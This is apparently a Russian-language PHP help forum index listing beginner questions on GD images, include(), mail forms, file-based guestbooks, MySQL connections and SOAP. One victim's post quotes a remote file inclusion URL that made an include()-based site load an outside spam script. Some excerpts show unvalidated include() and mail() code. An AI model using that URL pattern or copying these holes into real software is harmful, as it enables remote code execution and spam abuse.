PHP
A general-purpose scripting language especially suited to web development
Explore Questions
There are no popular questions to show right now
-
0 votes2 answers
-
0 votes1 answer
-
0 votes1 answer
-
0 votes2 answers
-
0 votes0 answers
2,481 questions in this forum
-
PNG+GD Сохранение частичной полупрозрачности
Добрый вечер. Возникла пролема с работой GD в php. Требуется нанести текст на баннер в формате png с частичной прозорачностью. Текст на банннер наносится,но прозрачные и полупрозрачные участки становятся черными. Подскажите,плз,как это устранить. Вот часть кода header ("Content-type: image/png; charset=windows-1251"); $source = imagecreatefrompng($fichierSource); $largeurSource = imagesx($source); $hauteurSource = imagesy($source); $color = ImageColorAllocate ($source, $red, $green, $blue); $h = $font_size+5; for ($i=0;$i<count($banner_text);$i++) { $box = imagettftext($source, $font_size, 0, $im_width, $h, $color, "fonts/".$font, iconv("CP1251", "UT…
0 votes2 answers -
Функция shuffle
Господа, что-то я никак не могу понять принцип работы САБЖевой функции. <?php $filename = "myfile.txt"; $newfile = @fopen($filename, "r") or exit("Could not open file"); //Создаем массив из содержимого файла, разделитель - пробел $file_contents = @fgetcsv($newfile, filesize($filename)," ") or exit("Could not read file contents"); //Перемешиваем и результат помещаем в переменную result $result = shuffle ($file_contents); echo $result . " "; echo sizeof($file_contents) . " "; echo sizeof($result) . " "; //Все грустно fclose($newfile); ?> Размер массива ($file_contents) равен числу слов в файле. После перемешивания - shuffle ($file_contents); - размер массива $…
0 votes6 answers -
Вопрос о функции include(); и модулях
Ребята, у меня такой вопрос: Если мы выполняем include("filename.php"); мы, фактически, добавляем весь его код, в страницу, которая выполняется. Рассмотрим ситуацию, когда файл, который мы 'инклюдим' находится в каталоге dir и использует картинку из этого же каталога (путь используется отностильный ). Инклюдим мы его из каталога выше. Конечно картинка при этом выводится уже не будет, потому что вызываться она будет из каталога выше dir, а ее там нет и небыло. Вопрос: - Какую функцию следует использовать, чтобы получить код, после исполнения "dir/filename.php", чтобы путь к картинке остался в нормальной форме? Мой вариант реализации - получаем весь код исполнения скрипта п…
0 votes7 answers -
upload картинок через визуальный редактор
Интересен вопрос загрузки картинок через визуальный JS редактор типа FCKEditor или ему подобных. Тоесть, просто копируем текст с картинками в буфер и вываливаем его в визуальный редактор. Вопрос: можно ли узнать Temp-путь картинки? можно ли через js узнать base32 код картинки? Эту тему можно отнести и к Php и к Js. Еще не определился...
0 votes10 answers -
Отправление сообщений с сайта.
Всем привет! Вот у меня есть скрипт: <?php if(empty($_POST['name'])) { die('Вы не ввели тему'); } if(empty($_POST['body'])) { die('Вы не ввели сообщение'); } $to=$_POST["to"]; $name=$_POST["name"]; $body=$_POST["body"]; mail($to,$name,$body); print "<p>Спасибо за сообщение</p>" ?> Как сделать так чтобы а)если пользователь не ввел допустим тему, сообщение не отправлялось. б)как прописать отправителя, у меня в поле от кого пишется Unprivileged user Помогите юзеру!
0 votes39 answers -
Как написать портал на файлах
Всем привет! Вот мне вздумалось написать портал на php. Решил поискать в инете, а там только описывается как сделать портал на MySQL. А мне надо сделать на файлах. Подскажите как это сделать (ну или линк дайте).
0 votes25 answers -
Проблема с самописным движком
Вот написал некое подобие движка. Вот код <?php function e_list(){ global $out; $index=$articles[33]["body"]; $out["center"].="$index"; } function e_show(){ global $out, $articles; $id=$_GET["id"]; $name=$articles[$id]["title"]; $body=$articles[$id]["body"]; $out["title"].="$name"; $out["center"].="<p>$body</p>"; } $txt1=file_get_contents("beach3.txt"); $txt2=file_get_contents("beach4.txt"); $txt3=file_get_contents("beach-f4.txt"); $txt4=file_get_contents("beach-f6.txt"); $txt5=file_get_contents("beach-f5.txt"); $txt6=file_get_contents("beach-f7.txt"); $txt7=file_get_contents("beach-f8.txt"); $txt8=file_get_contents("beach-f9.txt"); $txt9=file_get_conte…
0 votes19 answers -
простая гостевая с премодерацией
Привет, Посоветуйте, пожалуйста, простую гостевуху (на перле, пхп, ...) лиж бы поддерживала премодерацию, и можно было легко (без проблем) подрихтовать под дизайн существующего сайта, остальное не так важно. гугл выда?т кучу разнощ?рстных вариантов, хочется совета от человека. спасибо
0 votes3 answers -
Индексация сайта и поиск
Подскажите плз основной принцип или идею индексации сайта, а то я весь рунет перерыл - информации грош. Ситуация: нужен поиск на сайт на php или на perl, желательно было б написать ручками но писать не зная или выдумывать велосипед не хАцю ПО роли не играет, единственное - Oracle, нужно взаимодействие с БД.
0 votes2 answers -
детализации ошибок
Задача: запустить удаленную процедуру. (mssql_execute) Дано. mssql_connect проходит нормально mssql_query Работает нормально данные выбираются mssql_execute - Не работает Выдает ошибку (ошибку вывожу с помощю error_reporting(E_ALL ) Warning: mssql_execute() stored procedure execution failed in..... До этого работал на другом хостинге 1гб там если возникали какие либо ошибки то они выдавалиь в таком виде (Для вывода ошибок ни где не чего не прописывал не в коде не в .htaccess) Warning: mssql_execute(): message: @сIdТУТ is not a parameter for procedure.... Warning: mssql_execute(): stored procedure execution failed in... Тоесть помимо ошибки о том то что не сработала проц…
0 votes1 answer -
Проблема с гостевой
Всем привет. Вот вздумалось мне написать госевую книгу на php. Ну сел и начал писать. Дело в том что я хочу чтоб эта госевая книга была на файлах. Вот код обработчика: Код обработчика <?php if($_POST["name"]==""){ print "Вы не ввели имя "; } if($_POST["e-mail"]==""){ print "Вы не ввели свой e-mail "; } if($_POST["msg"]==""){ print "Вы не ввели сообщение "; } $gost=$_POST["name"],$_POST["e-mail"],$_POST["msg"]; $fp=fopen("baza.txt","a"); fputs($fp, $gost); fclose($fp); print "Нам написали: "; readfile("baza.txt") ?> А вот код гостевой: Код <html> <head> <title></title> </head> <body> <form action="gostev.php" method="post">…
0 votes27 answers -
Проблемка..
Здраствуйте. У меня проблема. (сразу предупреждаю, вопрос от юзера в MySQL) Когда я устанавливал скрипт (с изпользаванием MySQL) он не может создать базу данных. Как сделать базу данных самому?
0 votes10 answers -
Порблема с защитой, попытка отправки спама с моего email
Добрый день! Возникла проблема. Страницы на сайте генерируются с помощью функции include(), адрес файла передается в ссылке пример index.php?cont=vasya.html. нехороший человек сделал следующее index.php?cont=http://www.freewebtown.com/xslayter1533/frangoSlayter.txt? там форма для рассылки спама... Спам до адресатов не дошел, но ситуация очень неприятная... Каким образом можно защитить сайт от подобных попыток? Слышал что можно кодировать данные в md5, но как именно не понял. Или есть более простая (надежная альтернатива)? Я понимаю, что ошибка глупейшая но очень надеюсь на Вашу помощь!
0 votes6 answers -
Как насчет многосайтовости?
Итак, делаю кое что интересное... В корне лежит index.php: $db = $db->connect(); $db->select_table( А вот тут проблема! ); Я вот что хочу сделать... Чтобы в зависимости от того какой алис(домен) используеться для сайта подключалась та или иная таблица(именно для этого сайта). Грубоговоря сайт лежит на хосте. Мы к нему обращаемся по www.site.com. И брать таблицу будем www_site_com. У меня вопрос в следующем. Использовать $_SERVER[HTTP_HOST] либо $_SERVER[sERVER_NAME]? Потомучто на локалке при подключении виртуального хоста переменные равны.
0 votes4 answers -
Кусочек другого сайта
Всем здрасти. Сказали обратиться к пхпшникам. Сразу начну с примера, что б точнее объяснить, что я хочу. Допустим сайт торрентс.ру. Вверху каждой темы есть две строки-сидеры, личеры и их значения, которые постоянно меняются. Возможно ли сделать так, что бы эти строки отражались у меня? Если да, то как?
0 votes4 answers -
Фильтрация ввода
Достаточно ли для безопасности фильтровать ввод с помощью htmlspezialchars() для текстового поля? Можно ли при этом быть уверенным в защите от вставки тэгов и ДЖС-кода?
0 votes2 answers -
Подключение PHP к MySQL на localhost
Я в этой области почти новичок, столкнулся с такой проблемой: Все установлено на localhost: Apache, PHP, MySQL.... MySQL сервер запущен, Apache с установленным PHP запущен - проверял в "Службах"... Проблема: не удается установить соединение PHP с MySQL... создал файл *.php со следующим содержанием: <?php if (mysql_connect("localhost", "root", "pass")) { echo "Соединение установлено"; } else { echo "Соединение НЕ установлено"; } ?> В итоге на экран не выводится вообще ничего!.. Подскажите, что не так?.. При этом - логин и пароль для MySQL сервера набраны правильно! т.к. набирая в коммандной строке cmd: mysql -uroot -ppass вхожу на MySQL сервер!.. Спасибо зар…
0 votes7 answers -
инклуиды
Доброе утро! Собрался делать сетку сателлитов в своих целях. Сделал парочку сатав после чего столкнулся с тем что саты сделанные на html+css очень не удобно обновлять и другое приходиться влазить в каждую страницу что бы допустим поменять footer и т.д. Кто что может посоветовать именно по инклуидам ( сори если не правильно написал ) зарание всем спасибо. 1. скачал денвер установил что дальше делать ? .... п.с. на гугле не что не нашел.
0 votes16 answers -
заморочка с визуальным выводом
есть текстовый файл с таким вот содержанием (к примеру) фильтровать и выводить его я могу через массивы, это не сложно, прблема в том что тогда в каждой строке выводятся все парматеры или какие то ваааащее не выводятся. выше написано не ясно. но то что я это хоть как то сделать могу думаю понятно, вопрос в следующем как мне выводить эту инфу в таком виде тоесть подобие сводной таблицы в екселе =) вы хотя бы подскажите, бо сей алгоритм у меня в голове не укладываетсо
0 votes5 answers -
Denwer. не запускаеться внешний web-site
Проблема. Ввожу в браузер url: http://www.some_site.ru если Denwer отключен: http://www.some_site.ru не загружаются. если Denwer включен : открывается http://www.some_site.ru/denwer/ ПОЧЕМУ НЕ ОТКРЫВАЕТЬСЯ ВНЕШНИЙ САЙТ http://www.some_site.ru ???
0 votes12 answers -
PHP vs SOAP
Решил попробовать расширение SOAP в PHP. Написал простенький WSDL и к нему скрипт, реализующий логику. Все так сказать по мануалу. Соответственно, написал простенького клиента: <?php $params = array('soap_version' => SOAP_1_2, 'encoding'=>'UTF-8', 'compression' => SOAP_COMPRESSION_ACCEPT | SOAP_COMPRESSION_GZIP); $client = new SoapClient("http://test.travelsnotes.com/stockquote.wsdl", $params); try { echo "<pre>n"; print($client->getQuote("ibm")); echo "n</pre>n"; } catch (SoapFault $exception) { echo $exception; } ?> Все проверил на локальном сервере, работает за милую душу. Более того проверил клиен…
0 votes3 answers -
Запуск страниц без их открытия
В общем представьте например следующюю процедуру. Заходиш на сайт и там стоит например счетчик и к нему прикреплено еще, что-то. Чтоб не напрягать пользователей, необходимо отделить эт процедуру от пользователя. Т.е. он открывает страницу, а там дальше без его ведома хоть до бесконечности, чтоб происходили действия и процедуры. Как это можно сделать?
0 votes3 answers -
Меню и подменю
В PHP есть строка: Пункт Пункт Пункт Пункт Пункт Пункт Пункт Пункт Пункт (пункты разные). Можно ли превратить ее в многомерный массив (сохраняя иерархию) с помощью регулярных выражений?
0 votes5 answers -
PHP в HTML
Всем привет! Вот какой вопрос: можно ли как-то сделать, чтобы PHP код выполнялся в HTML файлах?
0 votes30 answers -
Короче на локалке винда и при передаче методом пост если в тексте есть кавычки все ок, а на серваке они экранируются. Подскажите пожалуйста с чем это связано?
0 votes4 answers